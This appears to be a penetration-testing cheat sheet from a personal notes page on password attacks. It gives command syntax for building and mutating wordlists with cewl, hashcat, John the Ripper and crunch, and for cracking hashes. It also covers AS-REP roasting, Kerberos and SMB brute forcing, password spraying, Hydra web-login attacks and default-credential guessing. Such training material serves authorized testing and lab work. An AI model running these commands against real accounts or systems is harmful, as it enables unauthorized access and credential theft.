Return to Main Page

Password Attacks

Password Wordlist Creation

Custom wordlist creation

  • Word ideas
    • Duplicate username (upper and lowercase)
  • Upper/Lowercase
    • Capitalize all first letters
    • lowercase all characters
  • Domain name
  • All the months
  • "password"
  • machine name
  • autumn, fall, spring, summer
  • append years
    • Current years
      • for i in $(cat passwords); do echo $i; echo ${i}2019; echo ${i}2020; echo ${i}\!;
  • add !'s
  • Mutate wordlist using hashcat

    • Wordlist scraping tools

  • cewl
    • Scrapes websites for words
    • Example: cewl www.megacorpone.com -m 6 –w megacorp-cewl.txt
      • -m 6 Minimum letters per word
      -d Depth of pages to grab words from
      --with-numbers Grab words with numbers
      -w outfile

    Wordlist mutation tools

  • hashcat
    • Wordlist mutation example:
      • hashcat --force --stdout passwords -r /usr/share/hashcat/rules/best64.rule | sort -u
        • Chain wordlist rule mutations
          • hashcat --force --stdout passwords -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u
    • Can create custom rule sets for password list mutation.
  • John the Ripper
    • Edit /etc/john/john.conf
      • [List.Rules:Wordlist] section to define worlist mutations
        • $ Append character to original word in word list
        [0-9] All characters between 0-9
        Example rule: 
        # Add two numbers to the end of each password
$[0-9]$[0-9]
    • --rules flag to activate the rules in the configuration file
    • Mutated wordlist creation example: john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
  • Crunch
    • Can create a wordlist based off of known password requirements
      • Example – password must contain: 1 Capital letter, 2x lowercase letters, 2x special characters, 3x numeric, and 8 characters long total
        • crunch 8 8 –t ,@@^^%%%
          • Output would be 160GB
      • Example 2 – Wordlist with characters 0-9, A-F, and between 4 and 6 characters in length
        • crunch 4 6 0123456789ABCDEF –o crunch.txt
      • Example 3 – Create wordlist using a character set
        • /usr/share/crunch/charset.lst
        • crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt

    Cracking Hashes

  • Hashcat
    • Can crack passwords using brute force, a word list, or a combination
    • Wordlist attack syntax: hashcat -a 0 -m <mode for hash type> <file containing hashe(s)> <word list> [-r <rules file>]
      • Using a rules file will mutate wordlists on the fly.
        • rules\best64.rule is a solid starting point for rule usage
      • rockyou.txt is a good wordlist to start with usually.
    • Identify hash mode for hash type
      • Go to https://hashcat.net/wiki/doku.php?id=example_hashes
      • Search for first characters of hash. This will typically find the mode you are looking for.

    Active Directory

  • Query LDAP for users to attack
  • Check password policies for lockouts, lengths, etc
    • crackmapexec smb --pass-pol <ip address>
  • Pre-auth attack
    • ASREPRoast
      • Queries target domain for users with 'Do not require Kerberos pre-authentication' set and export their TGTs for cracking.
        • impacket-GetNPUsers
          • Usage GetNPUsers -dc-ip <ip address> -request '<Domain Name - Example: htb.local>/'
          Format output for hashcat GetNPUsers -dc-ip <ip address> -request '<Domain Name - Example: htb.local>/' -format hashcat
    • Kerbrute
      • Will not generate typical failed login attempt error code
    • pyKerbrute
      • Supports NTLM hash brute forcing as well as TCP support. Kerbrute only supports UDP
  • SMB
    • Brute force username & password list crackmapexec smb <ip address> -u <user list> -p <password list>
    Brute force username & hash list crackmapexec smb <ip address> -u <user> -H <hash>
  • Local Brute Force
    • Spray-Passwords
      • https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1
      • Sprays passwords locally
      • Test passwords against other user & admin accounts as another user

    Web application

  • Tools
    • Hydra
      • hydra <IP Address> http-post-form -l <username> -P <password file> "<Path>:<Data>:<Failed Login Text>"
      • hydra dms-pit.htb http-post-form -l michelle -P /usr/share/wordlists/rockyou.txt "/seeddms51x/seeddms/op/op.Login.php:login=^USER^&pwd=^PASS^&lang=:incorrect"

    Guessing credentials

  • <service name>:<service name>
  • <username>:<username>
  • <application name>:<application name>
  • /usr/share/seclists/Passwords/Default-Credentials

    • File types to hashes

    SSH
  • ssh2john - crack hash with CPU
  • sshng2john - crack hash using Jumbo John (use GPU)
    		•
    Password protected office products (Excel, word, etc.) Office2john